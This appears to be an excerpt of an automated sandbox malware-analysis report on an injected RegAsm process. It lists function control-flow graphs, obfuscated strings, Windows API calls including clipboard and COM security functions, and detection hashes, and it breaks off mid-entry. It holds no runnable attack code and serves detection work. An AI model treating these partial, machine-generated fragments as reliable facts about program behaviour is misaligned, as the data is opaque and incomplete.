40b9c0-40b9c2 329->333 335 40ba60-40ba6c 330->335 336 40ba29-40ba34 330->336 334 40b9f0-40ba1f 331->334 332->324 332->325 333->332 334->330 334->334 337 40baf3-40baf8 335->337 338 40ba47-40ba4b 336->338 337->301 338->313 339 40ba4d-40ba54 338->339 340 40ba56-40ba58 339->340 341 40ba5a 339->341 340->341 342 40ba40-40ba45 341->342 343 40ba5c-40ba5e 341->343 342->338 344 40ba71-40ba73 342->344 343->342 344->313 345 40ba75-40ba8b 344->345 345->337 346 40ba8d-40ba8f 345->346 347 40ba93-40ba96 346->347 348 40ba98-40bab8 call 40d440 347->348 349 40baed 347->349 352 40bac2-40bac8 348->352 353 40baba-40bac0 348->353 349->337 352->337 353->347 353->352
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: ,S$Fl~F$JXCJ$u+M)$uzx
                            • API String ID: 0-2037644107
                            • Opcode ID: 39e62cd96fcdcd1f1da942e1a86f174d0e3441f32f88b3bb4275162535282352
                            • Instruction ID: df203a7028aef8c9eeca6c234a75b3b5352681f46a594e723e5817ee723878bb
                            • Opcode Fuzzy Hash: 39e62cd96fcdcd1f1da942e1a86f174d0e3441f32f88b3bb4275162535282352
                            • Instruction Fuzzy Hash: E6E1377060C3809BD311DF19C49062BBBE1EFC6758F18892EE4D9AB391D3799845CF9A
                            Function 0040C608 Relevance: 1.6, Strings: 1, Instructions: 334COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 419 40c608-40c62b 420 40c65c-40c674 419->420 421 40c62d-40c62f 419->421 424 40c3e2-40c3fe 420->424 425 40c4ba-40c4c4 420->425 426 40c67b-40c67d 420->426 427 40c28f-40c29f 420->427 422 40c630-40c65a 421->422 422->420 422->422 428 40c400-40c42a 424->428 429 40c42c-40c452 424->429 431 40c3c0 425->431 432 40c382 425->432 433 40c3c2-40c3cc 425->433 434 40c366-40c36d 425->434 435 40c3a6-40c3ac call 433600 425->435 436 40c5c9-40c5e5 425->436 437 40c4cb-40c52b 425->437 438 40c3af-40c3b4 425->438 439 40c2f0-40c313 425->439 440 40c2b0-40c2b9 425->440 441 40c390 425->441 442 40c3d3 425->442 443 40c374-40c377 425->443 444 40c3d5-40c3e1 425->444 445 40c398-40c39f 425->445 446 40c2d9-40c2e9 425->446 447 40c35a-40c35f 425->447 448 40c31a-40c31e 425->448 449 40c5fc-40c603 425->449 450 40c37c 425->450 451 40c2be-40c2d2 425->451 452 40c33f-40c353 call 435730 425->452 430 40c67f-40c692 426->430 427->430 427->440 428->428 428->429 456 40c454 429->456 457 40c49c-40c4b3 429->457 430->431 430->433 430->435 430->438 430->441 430->442 430->444 430->445 432->441 433->442 433->444 434->431 434->432 434->433 434->435 434->438 434->440 434->441 434->442 434->443 434->444 434->445 434->450 435->438 471 40c5ec-40c5f5 436->471 458 40c55a-40c565 437->458 459 40c52d-40c52f 437->459 438->431 439->431 439->432 439->433 439->434 439->435 439->438 439->440 439->441 439->442 439->443 439->444 439->445 439->448 439->450 440->451 441->445 442->444 443->449 445->431 445->433 445->435 445->438 445->442 445->444 446->448 447->431 447->432 447->433 447->434 447->435 447->438 447->440 447->441 447->442 447->443 447->444 447->445 447->448 447->450 461 40c327-40c338 448->461 451->431 451->432 451->433 451->434 451->435 451->438 451->439 451->440 451->441 451->442 451->443 451->444 451->445 451->446 451->447 451->448 451->449 451->450 451->452 452->431 452->432 452->433 452->434 452->435 452->438 452->439 452->440 452->441 452->442 452->443 452->444 452->445 452->447 452->448 452->450 464 40c460-40c49a 456->464 457->425 457->427 467 40c581-40c590 458->467 468 40c567-40c56f 458->468 466 40c530-40c558 459->466 461->431 461->432 461->433 461->434 461->435 461->438 461->439 461->440 461->441 461->442 461->443 461->444 461->445 461->447 461->448 461->450 461->452 464->457 464->464 466->458 466->466 475 40c592-40c594 467->475 476 40c5b5-40c5c2 467->476 474 40c570-40c57f 468->474 471->431 471->432 471->433 471->434 471->435 471->438 471->439 471->440 471->441 471->442 471->443 471->444 471->445 471->446 471->447 471->448 471->449 471->450 471->451 471->452 474->467 474->474 478 40c5a0-40c5b1 475->478 476->436 478->478 479 40c5b3 478->479 479->476
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: =:
                            • API String ID: 0-1718407200
                            • Opcode ID: 2712ea4c7aa15ac441bd5282f5cc162de9a3f3750147b887a23d051f12a3ecb2
                            • Instruction ID: 1089a7ef239c9f25b0ee1005acc8961ea338ea3e14267cb8875c2489559c995e
                            • Opcode Fuzzy Hash: 2712ea4c7aa15ac441bd5282f5cc162de9a3f3750147b887a23d051f12a3ecb2
                            • Instruction Fuzzy Hash: B8C1B0B5A04266CBDB048FA4DC91B7FBBB1FF4A301F144569E811AB390D734A851CBA8
                            Function 00435810 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 486 435810-435842 LdrInitializeThunk
                            APIs
                            • LdrInitializeThunk.NTDLL(0042FB5E), ref: 0043583E
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                            • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                            • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                            • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                            Function 00434BE6 Relevance: .0, Instructions: 47COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 594 434be6-434c2a 595 434c6f-434c76 594->595 596 434c2c-434c2f 594->596 598 434c79-434c89 595->598 597 434c30-434c6d 596->597 597->595 597->597
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 598430cd527e33aab92cbcfbf514eb2a03a6fb2617a4be0deedf97ff1de644dc
                            • Instruction ID: 31bc1f29c4935cdfadb3b3ee7aa1a4ae93faf8a613a3d1a2f4c605590701bd52
                            • Opcode Fuzzy Hash: 598430cd527e33aab92cbcfbf514eb2a03a6fb2617a4be0deedf97ff1de644dc
                            • Instruction Fuzzy Hash: 7F119A789016168FEB24CF94C5506AEBBF2BF8A300F20494DD4A277780C3387E00CBA9
                            Function 0040AD60 Relevance: 19.8, APIs: 2, Strings: 9, Instructions: 587COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 40ad60-40adb3 1 40adb5 0->1 2 40adf6-40ae13 call 4348c0 0->2 3 40adc0-40adf4 1->3 7 40ae19-40af39 call 436eb0 * 12 2->7 8 40b53a-40b546 2->8 3->2 3->3 33 40af40-40af58 call 430780 7->33 36 40af60-40af67 33->36 36->36 37 40af69-40af7b 36->37 38 40afe1-40aff1 call 40b550 37->38 39 40af7d-40af86 37->39 46 40aff7-40affd 38->46 47 40b258-40b260 38->47 41 40af90-40af93 39->41 43 40afd0-40afd3 41->43 44 40af95-40afb4 call 40d440 41->44 45 40afd6-40afda 43->45 53 40afb6-40afbc 44->53 54 40afbe-40afc4 44->54 45->38 46->33 50 40b003-40b104 46->50 51 40b262-40b267 47->51 52 40b28f 47->52 55 40b154-40b16d call 40bb40 50->55 56 40b106 50->56 57 40b270-40b282 51->57 58 40b298-40b2a4 CoInitializeEx 52->58 53->41 53->54 54->45 59 40b538 55->59 67 40b173-40b1d3 55->67 61 40b110-40b152 56->61 57->57 63 40b284-40b28d 57->63 58->59 60 40b2aa-40b2c4 CoInitializeSecurity 58->60 59->8 60->59 64 40b2ca-40b2d9 call 42fb80 60->64 61->55 61->61 63->58 64->8 68 40b214-40b21f 67->68 69 40b1d5 67->69 72 40b225-40b229 68->72 73 40b2de 68->73 71 40b1e0-40b212 69->71 71->68 71->71 74 40b23b-40b23f 72->74 75 40b2e0-40b2e2 73->75 76 40b245-40b24c 74->76 77 40b52c-40b530 call 433600 74->77 75->77 78 40b2e8-40b30c 75->78 79 40b252 76->79 80 40b24e-40b250 76->80 89 40b535 77->89 81 40b346-40b34f 78->81 82 40b30e-40b30f 78->82 85 40b230-40b235 79->85 86 40b254-40b256 79->86 80->79 87 40b351-40b35b 81->87 88 40b384-40b386 81->88 84 40b310-40b344 82->84 84->81 84->84 85->74 85->75 86->85 91 40b367-40b36b 87->91 88->77 90 40b38c-40b394 88->90 89->59 92 40b3a0-40b3a8 90->92 91->77 93 40b371-40b378 91->93 92->92 94 40b3aa-40b3ad 92->94 95 40b37a-40b37c 93->95 96 40b37e 93->96 99 40b3b3-40b3b5 94->99 100 40b455-40b464 94->100 95->96 97 40b360-40b365 96->97 98 40b380-40b382 96->98 97->88 97->91 98->97 101 40b421-40b423 99->101 102 40b3b7-40b3c0 99->102 103 40b470-40b477 100->103 104 40b425-40b42a 101->104 105 40b3d7-40b3e4 102->105 103->103 106 40b479-40b48f 103->106 104->100 107 40b42c-40b439 104->107 108 40b3e6-40b3ee 105->108 109 40b3fa-40b40e 105->109 110 40b491 106->110 111 40b4cd-40b4dd call 40b550 106->111 112 40b43b-40b443 107->112 113 40b44e 107->113 115 40b3f0-40b3f3 108->115 116 40b3f5-40b3f8 108->116 118 40b410-40b418 109->118 119 40b3c7-40b3d5 109->119 117 40b493-40b497 110->117 111->77 127 40b4df-40b4ee 111->127 120 40b445-40b447 112->120 121 40b449-40b44c 112->121 113->100 115->116 116->109 123 40b4c7-40b4ca 117->123 124 40b499-40b4b5 call 40d440 117->124 125 40b3c2-40b3c5 118->125 126 40b41a-40b41f 118->126 119->104 119->105 120->121 121->113 123->111 134 40b4b7-40b4bd 124->134 135 40b4bf-40b4c5 124->135 125->119 126->125 129 40b4f0-40b4f4 127->129 130 40b511-40b524 call 433600 127->130 132 40b500-40b50f 129->132 130->58 137 40b52a 130->137 132->130 132->132 134->117 134->135 135->111 137->59
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: w$%X2D$33OL$4H<<$>L?F$Q.!z$V$w9$zu
                            • API String ID: 0-3041256623
                            • Opcode ID: e9533fdc050cdcb6eda38f650c1c3a2b138564bc671a5f00bafcd290cdffeb15
                            • Instruction ID: ef3b54fbc542b14f6c73e22f2912dc2635c8c61c08c96c3d0a6a9e9b921cc6e8
                            • Opcode Fuzzy Hash: e9533fdc050cdcb6eda38f650c1c3a2b138564bc671a5f00bafcd290cdffeb15
                            • Instruction Fuzzy Hash: 2C12E2745083809FD3119F15D89076ABBE1EF92308F14893EE8D56B3A1E3399945CF9E
                            Function 00435730 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 354 435730-435743 355 4357d2 354->355 356 4357f0-4357f6 call 433570 354->356 357 4357d0 354->357 358 43574a-435751 354->358 359 43580a-43580e 354->359 360 4357d8-4357e1 call 433570 354->360 361 435758-435775 354->361 362 4357ff-435808 call 433600 354->362 355->360 356->362 357->355 358->357 358->359 358->361 358->362 360->356 366 4357b0-4357ca RtlReAllocateHeap 361->366 367 435777 361->367 362->359 366->357 371 435780-4357ae 367->371 371->366 371->371
                            APIs
                            • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,?,?,?,?), ref: 004357BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID: XC$T+*)
                            • API String ID: 1279760036-83620039
                            • Opcode ID: b90adefde314020e7cb3bec5546f2ddf62c89f97bea9e003eb00fa010db9e4d5
                            • Instruction ID: 275f513f85c0e10003a68155203a30c7837510361a6234f465f245949248d44b
                            • Opcode Fuzzy Hash: b90adefde314020e7cb3bec5546f2ddf62c89f97bea9e003eb00fa010db9e4d5
                            • Instruction Fuzzy Hash: 8811E9B550D600DFD318AF14E861A2BBBE5EF8A305F04893DE5C603351D7399825CB8B
                            Function 00409EE0 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 372 409ee0-409eea call 434900 375 409eec 372->375 376 409eee-409efb GetCurrentProcess call 42c2b0 372->376 377 409f39-409f42 ExitProcess 375->377 380 409efd 376->380 381 409eff-409f19 GetWindowInfo call 40ad60 376->381 382 409f30-409f37 call 435710 380->382 385 409f1e-409f20 381->385 382->377 387 409f22 385->387 388 409f24-409f29 call 40d5b0 call 40c260 385->388 390 409f2e 387->390 388->390 390->382
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Process$CurrentExit
                            • String ID:
                            • API String ID: 2333725396-0
                            • Opcode ID: 469bffd523c932773a289f971af5277c6893e6f35c927bdca07f41a2ce426539
                            • Instruction ID: 707411d0d077b8042f8232beaf35041bb5c6070a3f1e2660f66cd00515d2bfc6
                            • Opcode Fuzzy Hash: 469bffd523c932773a289f971af5277c6893e6f35c927bdca07f41a2ce426539
                            • Instruction Fuzzy Hash: B5F01C70828212DAC6107BB5960636E7790AF5030AF10883BE982E11D2EB7D8C0696AF
                            Function 00433616 Relevance: 1.5, APIs: 1, Instructions: 37memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 480 433616-43361d 481 433624-43363b 480->481 482 43367d-433682 480->482 483 43363d-43363f 481->483 484 43366c-433677 RtlFreeHeap 481->484 485 433640-43366a 483->485 484->482 485->484 485->485
                            APIs
                            • RtlFreeHeap.NTDLL(?,00000000), ref: 00433677
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: 08edd21f3268dde6274dd6f40c054a19b9fb257af7f608b4a9d6277c6b7e9243
                            • Instruction ID: fff21cc00efc6ebdaad620c28c08c0b431962fb4ffff5499017a4ce94b6d1578
                            • Opcode Fuzzy Hash: 08edd21f3268dde6274dd6f40c054a19b9fb257af7f608b4a9d6277c6b7e9243
                            • Instruction Fuzzy Hash: 19014B34E00648EFDB10CF58C490A9EBB32EB8A719F2480E9C84467A55C336AA57CB84

                            Non-executed Functions

                            Function 00422B90 Relevance: 75.4, APIs: 2, Strings: 41, Instructions: 174COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: MetricsSystem
                            • String ID: $%7B$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$@4B$E5B$E5B$E5B$E5B$E5B$E5B$E5B$E5B$E5B$E5B$E5B$E5B$E5B$E5B$E5B$E5B$E5B$L7B$X5B$h8B$i0B
                            • API String ID: 4116985748-351242847
                            • Opcode ID: 82034359cfe063cd8df8271fd181c8e3dd85c72f64f15ac54af74fb20c83ed29
                            • Instruction ID: 952bd2309bee09f1b048f46a3786841828a15db9d737109afb04df860e085775
                            • Opcode Fuzzy Hash: 82034359cfe063cd8df8271fd181c8e3dd85c72f64f15ac54af74fb20c83ed29
                            • Instruction Fuzzy Hash: CCB16FB080A380DFD371DF14C54978BBBF0BB89308F50A92ED5989B260D7B95549CF86
                            Function 00425300 Relevance: 28.1, APIs: 2, Strings: 12, Instructions: 3572COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: 34t$:\Bz$J,"$JNGL$NOHI$OCXe$OHI~$coS`$mhc'$rfdn$rxB$tM@y
                            • API String ID: 0-1858655138
                            • Opcode ID: ceb232338ed8c3d00e779c59b318b7e7c969c493bcf1db6aa11456674313c76b
                            • Instruction ID: 7e0072eed2b9e9ac91932f4044d18f8bee7b1121e84cff16f98a0b8e2f5fc5a5
                            • Opcode Fuzzy Hash: ceb232338ed8c3d00e779c59b318b7e7c969c493bcf1db6aa11456674313c76b
                            • Instruction Fuzzy Hash: 5343CF70204B928BD325CF39D5907A7BBE1AF16304F58896EC4EB8B792D739B405CB58
                            Function 0041B0B0 Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 375COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: oa$!S-U$)_;Q$+W!i$8OpA$9K,M$:G"Y$E7CI$HK$U3@5$tw$[Y
                            • API String ID: 0-2051208641
                            • Opcode ID: b7cce3d0297a7ccb83e5ba3d69101fa120dbaeb2a0da20250d1db482eb56d349
                            • Instruction ID: e203c9d52fa2924137864d08c031f1e552db2258daf27c2a34401d7e440933d9
                            • Opcode Fuzzy Hash: b7cce3d0297a7ccb83e5ba3d69101fa120dbaeb2a0da20250d1db482eb56d349
                            • Instruction Fuzzy Hash: 2DD150B42083819BD300DF59D490A2BBBF0EF86B48F10491DF5C59B3A1E3789945CB9B
                            Function 0041E724 Relevance: 15.8, Strings: 12, Instructions: 832COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: !g.i$#k$m$/c!e$4`[b$7s;u$AFDH}FGs$KNsI$RR\B$bA$}FGs$GI$SU
                            • API String ID: 0-995930031
                            • Opcode ID: 574d0eb81650275d2c73dd56182f674f6fd275c29bcf8f85e05fdaa7b7d1fe43
                            • Instruction ID: a4ff6947a4af4358d45151375257845f0c184265063985d46968217c51269198
                            • Opcode Fuzzy Hash: 574d0eb81650275d2c73dd56182f674f6fd275c29bcf8f85e05fdaa7b7d1fe43
                            • Instruction Fuzzy Hash: 665204B4908245CFDB14CF5AD8916AFBBB1FF89304F14492EE98267391C3389941CF99
                            Function 00415070 Relevance: 13.6, Strings: 10, Instructions: 1126COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: ,-$4y(g$8&$de$f`sn$lm$yv{f$qo$us$yw
                            • API String ID: 0-433410624
                            • Opcode ID: bf3344a45f3e5ed26ba41efd10d8616457f5440f212fa8b9655e44e838c50c04
                            • Instruction ID: 1e7359e32aee8b6de2bfa36efe6fbdb7b1dc5e1ff3dcaa62995ffa08e436384b
                            • Opcode Fuzzy Hash: bf3344a45f3e5ed26ba41efd10d8616457f5440f212fa8b9655e44e838c50c04
                            • Instruction Fuzzy Hash: DC72867010C380CFD314DF28D4916ABBBE2EF96344F588A1DE1D54B3A2D3799985CB9A
                            Function 0041E590 Relevance: 9.1, Strings: 7, Instructions: 383COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: !g.i$#k$m$/c!e$4`[b$7s;u$GI$SU
                            • API String ID: 0-2038440851
                            • Opcode ID: d080fe2b8919ed8fad79ae45f1c4543282b14612456d275207e7e05ded595e65
                            • Instruction ID: 350dea0a66e33bd1b85067b1e7e14391a197f43ceeb8c4e21b06777aa728e4ba
                            • Opcode Fuzzy Hash: d080fe2b8919ed8fad79ae45f1c4543282b14612456d275207e7e05ded595e65
                            • Instruction Fuzzy Hash: 7DC1C874108380DFD3149F1AD891A6BBBF1EF96708F54592DE6C24B3A2C3398855CB4A
                            Function 0042BDA0 Relevance: 9.1, APIs: 6, Instructions: 114clipboardCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Clipboard$CloseDataLongOpenWindow
                            • String ID:
                            • API String ID: 1647500905-0
                            • Opcode ID: b0f8fb53c903bb941c9eb0d5c9ef22c5a16c9bb6c3b9100cf18be646cef15a98
                            • Instruction ID: e98b86aa0008dccab69d828195768df74e6870743849198998d175323c31a643
                            • Opcode Fuzzy Hash: b0f8fb53c903bb941c9eb0d5c9ef22c5a16c9bb6c3b9100cf18be646cef15a98
                            • Instruction Fuzzy Hash: B2419EB0A087908FE711ABB8D4493AFBFE0EB01344F55882ED4D687382D7799548C7A7
                            Function 0040EE4A Relevance: 8.1, Strings: 6, Instructions: 642COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: (U$*$0$mA$p@$Y
                            • API String ID: 0-996351640
                            • Opcode ID: 3cede5767d4bc226a1201021285cb650e213ac01e381a4d3daf788e0e4465cfa
                            • Instruction ID: 0790ac10b4568a7dee3a5a2f5eebdd68a7f16505f4f131564c4801ff94cd21e9
                            • Opcode Fuzzy Hash: 3cede5767d4bc226a1201021285cb650e213ac01e381a4d3daf788e0e4465cfa
                            • Instruction Fuzzy Hash: A632ACB15083819BD324DF24D990B6FBBE1BF96304F14493EE48997392D778E809CB5A
                            Function 00412387 Relevance: 6.9, Strings: 5, Instructions: 699COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: "*A$4`[b$PQ$xz$y*A
                            • API String ID: 0-665878428
                            • Opcode ID: 8922721a0dba6fb8f893dc5343356d69cadda577c50281dab66f4e50d35e0795
                            • Instruction ID: b4e2b666b4c040661ae5538562d31a7ba604c775efbc74d5275d5f05199c722f
                            • Opcode Fuzzy Hash: 8922721a0dba6fb8f893dc5343356d69cadda577c50281dab66f4e50d35e0795
                            • Instruction Fuzzy Hash: DE229871608341ABD314DF24DA80B6BB7E1EF86744F08482DF485D7291D7B8DC59CBAA
                            Function 00436990 Relevance: 6.8, Strings: 5, Instructions: 551COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: 2mC$RjC$bqC$l;:9$rnC
                            • API String ID: 0-1406859836
                            • Opcode ID: 2b2293a025d24a76afdb00b59af73145c3f109e4811a787dc85c538965e065a4
                            • Instruction ID: 8cd9a2a021e0c6fdfbb4bcc665c5fcf802f15e99d15fab72cb3a3cac1ab94bbc
                            • Opcode Fuzzy Hash: 2b2293a025d24a76afdb00b59af73145c3f109e4811a787dc85c538965e065a4
                            • Instruction Fuzzy Hash: 8D02C139A08256CFCB04DF28D8A06AEB7F2FF8A314F1A847DD58597361D335A890CB55
                            Function 0041CB12 Relevance: 5.6, Strings: 4, Instructions: 648COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4`[b$4`[b$8:$<>
                            • API String ID: 0-3372471265
                            • Opcode ID: 141d37a4305f6528d7246f8cc475072ae30a48dda48bc3bd94c5696feacb3dc5
                            • Instruction ID: 88c39ac574b45957f2b03c67e101353368aa69be76ed857f0b800c0111119ba5
                            • Opcode Fuzzy Hash: 141d37a4305f6528d7246f8cc475072ae30a48dda48bc3bd94c5696feacb3dc5
                            • Instruction Fuzzy Hash: 3F12AB75508342CBC728DF24C8916ABB7F2FF99340F54892EE4D647360D7389985CB9A
                            Function 00436AE0 Relevance: 5.5, Strings: 4, Instructions: 492COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: 2mC$bqC$rnC$9>?
                            • API String ID: 0-2993571143
                            • Opcode ID: 9e732559005556c846aeeafde3644bed84dfb3281266989640b0dc1ceb508af8
                            • Instruction ID: 1aae6d129828d49608232b60a66e7f914259e990468084f7fa501d7e53c8de9b
                            • Opcode Fuzzy Hash: 9e732559005556c846aeeafde3644bed84dfb3281266989640b0dc1ceb508af8
                            • Instruction Fuzzy Hash: 56F1B039A08251CFCB04DF68D8A06AEB7F2FF8A314F1A857DD585A7361C334A851CB95
                            Function 0041D917 Relevance: 4.2, Strings: 3, Instructions: 471COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4`[b$4`[b$mk
                            • API String ID: 0-4268607107
                            • Opcode ID: 1ccb23df2879c6bcf0fbdffe50e0498a19b51528366702a6630b5368e8189988
                            • Instruction ID: bf7291e942165afb07a09e3a3337e7a7af6a3340b7c9eaf7a8dd3b350f05fcd5
                            • Opcode Fuzzy Hash: 1ccb23df2879c6bcf0fbdffe50e0498a19b51528366702a6630b5368e8189988
                            • Instruction Fuzzy Hash: 2CF1F2B5E0021ADFEB04CFA9D891AEEBBB1FF49300F145569E501AB391C734A951CF98
                            Function 00433A50 Relevance: 3.8, Strings: 3, Instructions: 79COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.2106991486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4`[b$=:;8$=:;8
                            • API String ID: 0-3970406503
                            • Opcode ID: dfa2c9e482ab6bc4acc89790b4831cefeb87b336c0cd02af8221a2696447d095
                            • Instruction ID: 10a9fdfcc45d67ef64bb423235b58f2bbfc27f1cc42caf01ea26fe0ccb4e6228
                            • Opcode Fuzzy Hash: dfa2c9e482ab6bc4acc89790b4831cefeb87b336c0cd02af8221a2696447d095
